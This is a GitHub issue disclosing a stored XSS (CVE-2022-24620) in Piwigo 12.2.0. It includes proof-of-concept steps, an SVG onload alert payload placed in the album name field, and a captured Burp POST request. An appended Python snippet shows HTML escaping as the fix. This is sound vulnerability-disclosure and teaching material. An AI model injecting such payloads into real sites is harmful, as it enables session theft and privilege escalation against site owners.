CVE-2022-24620: Piwigo-12.2.0 Vulnerable For Stored XSS Which Is Leading To Privilege Escalation · Issue #1605 · Piwigo/Piwigo

Piwigo version 12.2.0 is vulnerable to stored cross-site scripting (XSS), which can lead to privilege escalation: an admin can use it to steal the webmaster's cookies and obtain the webmaster's access.


Hi, I found a stored XSS in Piwigo version 12.2.0 (older versions not tested).

Proof Of Concept:

  1. Add an admin through webmaster’s access.
  2. Through the admin account open http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
  3. Add < svg onload=alert(1)> (Remove space) in the group name field.

Any malicious JS code can be used; now you can see the XSS pop up.

Impact:

In this way an admin can easily take over the webmaster's access using this technique.

Burp:

POST http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Cookie: pwg_id=lq5gpi2eacbfhhp9ckm0i60ee0; pwg_album_manager_view=tile; pwg_user_manager_view=line; PHPSESSID=hjg1fi2funadnubkkvb7381ede
Host: localhost
Origin: http://localhost
Referer: http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36

pwg_token=4feeb12539296772205ca90e39d382aa&virtual_name=%3Csvg+onload%3Dalert%281%29%3E&submitAdd=

[Screenshot - 2_3_2022, 12_42_32 AM]

Please fix the vulnerability & let me know :).

Thank You!

  • Chirag Artani
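As an added example (not code from the issue or from Piwigo), the form body captured above is decoded the way a server would decode it, then rendered into an album-list cell once by naive interpolation, the pattern behind this bug, and once with HTML output encoding, the fix. The cell template and function names are assumptions for illustration only.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the POST body from the report above.
CAPTURED_BODY = (
    "pwg_token=4feeb12539296772205ca90e39d382aa"
    "&virtual_name=%3Csvg+onload%3Dalert%281%29%3E&submitAdd="
)

# Hypothetical cell template for the admin album list.
CELL_PREFIX, CELL_SUFFIX = '<td class="album-name">', "</td>"


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_unsafe(name: str) -> str:
    """Vulnerable pattern: the stored name is interpolated into HTML verbatim."""
    return f"{CELL_PREFIX}{name}{CELL_SUFFIX}"


def render_safe(name: str) -> str:
    """Hardened: HTML-encode the untrusted value for an element-content context."""
    return f"{CELL_PREFIX}{html.escape(name, quote=True)}{CELL_SUFFIX}"


def cell_text(rendered: str) -> str:
    """Pull the cell content back out of a row built from the fixed template."""
    assert rendered.startswith(CELL_PREFIX) and rendered.endswith(CELL_SUFFIX)
    return rendered[len(CELL_PREFIX):-len(CELL_SUFFIX)]


def cell_has_markup(rendered: str) -> bool:
    """True when a raw tag survives inside the cell, i.e. a browser would parse it."""
    return re.search(r"<[A-Za-z!/]", cell_text(rendered)) is not None


if __name__ == "__main__":
    name = parse_form(CAPTURED_BODY)["virtual_name"]
    print("decoded name :", name)
    print("unsafe cell  :", render_unsafe(name), "-> tag survives:", cell_has_markup(render_unsafe(name)))
    print("safe cell    :", render_safe(name), "-> tag survives:", cell_has_markup(render_safe(name)))
```

The escaped cell still displays the literal text the admin typed (html.unescape of the cell content gives the original name back), so encoding loses nothing except the ability to inject markup.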
